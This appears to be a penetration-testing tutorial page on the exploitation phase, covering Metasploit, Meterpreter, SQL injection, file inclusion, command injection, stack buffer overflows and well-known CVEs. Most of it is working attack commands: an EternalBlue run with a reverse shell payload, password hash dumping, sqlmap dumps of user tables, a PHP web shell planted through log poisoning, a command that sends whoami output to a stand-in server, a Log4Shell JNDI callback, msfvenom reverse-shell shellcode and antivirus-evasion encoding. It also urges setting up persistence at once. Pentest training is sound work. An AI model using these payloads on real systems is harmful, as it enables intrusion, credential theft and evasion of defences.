Exploitation

Exploitation

Turning vulnerabilities into access

15 min readUpdated 2026-04-16
#metasploit#buffer-overflow#rce#sqli#lfi#cve
TL;DR
  • Exploitation converts a discovered vulnerability into unauthorized access — understanding the root cause beats running scripts blindly
  • Metasploit provides a unified framework for exploit modules, payloads, post-exploitation, and session management
  • Web vulnerabilities (SQLi, LFI, command injection) are the most common entry points in modern engagements
  • Buffer overflows require understanding memory at the register level — controlling EIP/RIP means controlling execution
  • One shell is never enough — establish persistence immediately; raw shells drop frequently and leave you starting over

Overview

Exploitation converts a discovered vulnerability into unauthorized access. It is the most technically demanding phase of a penetration test — and the most misunderstood. Reliable exploitation requires understanding the vulnerability at a protocol or memory level, not just running a script.

Prerequisites

  • Completed basic reconnaissance — you need identified targets and open services before exploiting them
  • Comfortable with Metasploit basics and both Linux and Windows command lines
  • Understanding of common protocols: HTTP, SMB, SSH, RDP

Recommended lab: HackTheBox Tier 1–2 machines — Blue and Legacy for Windows SMB exploits, Lame and Bashed for Linux. TryHackMe "Metasploit" room. PortSwigger Web Security Academy for web-specific exploits.

Vulnerability Research

Before exploiting, you need to understand what you're working with.

bash
# Search for known exploits by CVE or product
searchsploit apache 2.4
searchsploit -x exploits/linux/remote/46984.py  # examine without copying

# Check NVD for CVSS score and patch status
# https://nvd.nist.gov/vuln/search

# Identify running software versions
nmap -sV --version-intensity 9 10.10.10.5

Metasploit Framework

Metasploit is the standard framework for organizing and executing exploits. It handles payload staging, encoding, session management, and post-exploitation in a unified interface.

bash
# Start and update
msfconsole
msf6 > db_nmap -sV 10.10.10.5          # scan directly into DB

# Find and use a module
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.10.10.5
msf6 exploit(...) > set LHOST 10.10.14.2
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > run

Meterpreter Quick Reference

bash
meterpreter > sysinfo           # OS and hostname
meterpreter > getuid            # current user context
meterpreter > getsystem         # attempt privilege escalation
meterpreter > hashdump          # dump local password hashes
meterpreter > upload /tmp/tool.exe C:\\Windows\\Temp\\tool.exe
meterpreter > shell             # drop to OS shell
meterpreter > background        # return to msf console

Web Application Exploitation

Web apps are the largest attack surface in modern engagements.

SQL Injection

bash
# Automated discovery and exploitation
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D targetdb --tables
sqlmap -u "http://target.com/page?id=1" -D targetdb -T users --dump

# Bypass WAF with tamper scripts
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment --level=5

Local File Inclusion (LFI)

bash
# Basic traversal
curl "http://target.com/page?file=../../../../etc/passwd"

# Log poisoning via LFI > RCE
# 1. Inject PHP into User-Agent
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# 2. Include the log file
curl "http://target.com/page?file=/var/log/apache2/access.log&cmd=id"

Command Injection

bash
# Test payloads
; id
| id
&& id
`id`
$(id)

# Out-of-band detection with Burp Collaborator or interactsh
; curl http://your-oob-server.com/$(whoami)

Buffer Overflow (Stack-Based)

Classic stack overflow exploitation on 32-bit Linux targets.

bash
# 1. Find the offset to EIP
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
# Send pattern, get EIP value from crash, then:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41386241

# 2. Control EIP — confirm with 4 x B's at offset
# 3. Find bad characters
# 4. Find JMP ESP in loaded module (no ASLR/DEP)
!mona jmp -r esp

# 5. Generate shellcode
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -b "\x00" -f python

Common CVE Exploitation

CVEServiceType
CVE-2017-0144 (MS17-010)SMBv1RCE
CVE-2021-41773Apache 2.4.49Path traversal / RCE
CVE-2021-44228 (Log4Shell)Log4jRCE
CVE-2019-0708 (BlueKeep)RDPRCE
CVE-2014-6271 (Shellshock)Bash/CGIRCE
bash
# Log4Shell quick test (OOB DNS)
curl -H 'X-Api-Version: ${jndi:ldap://your-server.com/a}' http://target.com/

Operational Notes

  • Catch your shell firstnc -lvnp 4444 before triggering the exploit.
  • Encode payloads when AV is present — msfvenom -e x86/shikata_ga_nai -i 3.
  • Test in a lab — an untested exploit against production can crash services.
  • One shell is not enough — establish persistence immediately, shells are fragile.

What to Read Next

  • Post-Exploitation — a shell is just the start; escalate privileges, harvest credentials, and move laterally
  • Web Application Analysis — dedicated deep-dive into web-specific attack vectors
  • Password Attacks — hash dumps recovered during exploitation feed directly into cracking workflows
← PreviousPassword AttacksNext →Post-Exploitation
← back to knowledge base